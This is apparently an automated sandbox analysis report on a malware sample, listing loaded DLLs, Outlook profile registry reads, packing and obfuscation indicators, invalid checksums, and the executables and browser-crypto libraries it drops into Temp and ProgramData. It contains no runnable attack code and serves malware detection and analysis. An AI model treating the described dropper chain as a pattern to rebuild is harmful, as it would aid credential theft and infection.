Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: ukuWaeRgPR.exe Static file information: File size 2462720 > 1048576
Source: ukuWaeRgPR.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x216000
Source: Binary string: mozglue.pdbP source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Unpacked PE file: 0.2.ukuWaeRgPR.exe.c80000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Unpacked PE file: 6.2.EHDHDHIECG.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 9.2.explorti.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avjczlwa:EW;sysspafc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Unpacked PE file: 14.2.a3b2c9311b.exe.60000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C37C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.6.dr Static PE information: real checksum: 0x1e5b27 should be: 0x1ddbf1
Source: random[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x263909
Source: ukuWaeRgPR.exe Static PE information: real checksum: 0x0 should be: 0x263909
Source: EHDHDHIECG.exe.0.dr Static PE information: real checksum: 0x1e5b27 should be: 0x1ddbf1
Source: a3b2c9311b.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x263909
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1e5b27 should be: 0x1ddbf1
PE file contains sections with non-standard names
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: avjczlwa
Source: amadka[1].exe.0.dr Static PE information: section name: sysspafc
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: .idata
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: avjczlwa
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: sysspafc
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: avjczlwa
Source: explorti.exe.6.dr Static PE information: section name: sysspafc
Source: explorti.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34B536 push ecx; ret 0_2_6C34B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004BD82C push ecx; ret 13_2_004BD83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE2AA0 push 7EAE0002h; ret 14_2_7EAE2AAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE27A0 push 7EAE0002h; ret 14_2_7EAE27AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0CA0 push 7EAE0002h; ret 14_2_7EAE0CAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0FA0 push 7EAE0002h; ret 14_2_7EAE0FAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE12A0 push 7EAE0002h; ret 14_2_7EAE12AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE15A0 push 7EAE0002h; ret 14_2_7EAE15AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE18A0 push 7EAE0002h; ret 14_2_7EAE18AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1BA0 push 7EAE0002h; ret 14_2_7EAE1BAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1EA0 push 7EAE0002h; ret 14_2_7EAE1EAF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE21A0 push 7EAE0002h; ret 14_2_7EAE21AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE24A0 push 7EAE0002h; ret 14_2_7EAE24AF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE29B0 push 7EAE0002h; ret 14_2_7EAE29BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE26B0 push 7EAE0002h; ret 14_2_7EAE26BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0BB0 push 7EAE0002h; ret 14_2_7EAE0BBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0EB0 push 7EAE0002h; ret 14_2_7EAE0EBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE11B0 push 7EAE0002h; ret 14_2_7EAE11BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE14B0 push 7EAE0002h; ret 14_2_7EAE14BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE17B0 push 7EAE0002h; ret 14_2_7EAE17BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1AB0 push 7EAE0002h; ret 14_2_7EAE1ABF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1DB0 push 7EAE0002h; ret 14_2_7EAE1DBF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE20B0 push 7EAE0002h; ret 14_2_7EAE20BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE23B0 push 7EAE0002h; ret 14_2_7EAE23BF
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE2980 push 7EAE0002h; ret 14_2_7EAE298F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0E80 push 7EAE0002h; ret 14_2_7EAE0E8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1180 push 7EAE0002h; ret 14_2_7EAE118F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1480 push 7EAE0002h; ret 14_2_7EAE148F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1780 push 7EAE0002h; ret 14_2_7EAE178F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1A80 push 7EAE0002h; ret 14_2_7EAE1A8F
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE1D80 push 7EAE0002h; ret 14_2_7EAE1D8F
Source: ukuWaeRgPR.exe Static PE information: section name: entropy: 7.995655155988397
Source: ukuWaeRgPR.exe Static PE information: section name: entropy: 7.978560730889681
Source: ukuWaeRgPR.exe Static PE information: section name: entropy: 7.953798780964511
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.976322234409819
Source: amadka[1].exe.0.dr Static PE information: section name: avjczlwa entropy: 7.953937676701836
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: entropy: 7.976322234409819
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: avjczlwa entropy: 7.953937676701836
Source: explorti.exe.6.dr Static PE information: section name: entropy: 7.976322234409819
Source: explorti.exe.6.dr Static PE information: section name: avjczlwa entropy: 7.953937676701836
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.995655155988397
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.978560730889681
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.953798780964511
Source: a3b2c9311b.exe.13.dr Static PE information: section name: entropy: 7.995655155988397
Source: a3b2c9311b.exe.13.dr Static PE information: section name: entropy: 7.978560730889681
Source: a3b2c9311b.exe.13.dr Static PE information: section name: entropy: 7.953798780964511
Drops PE files
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
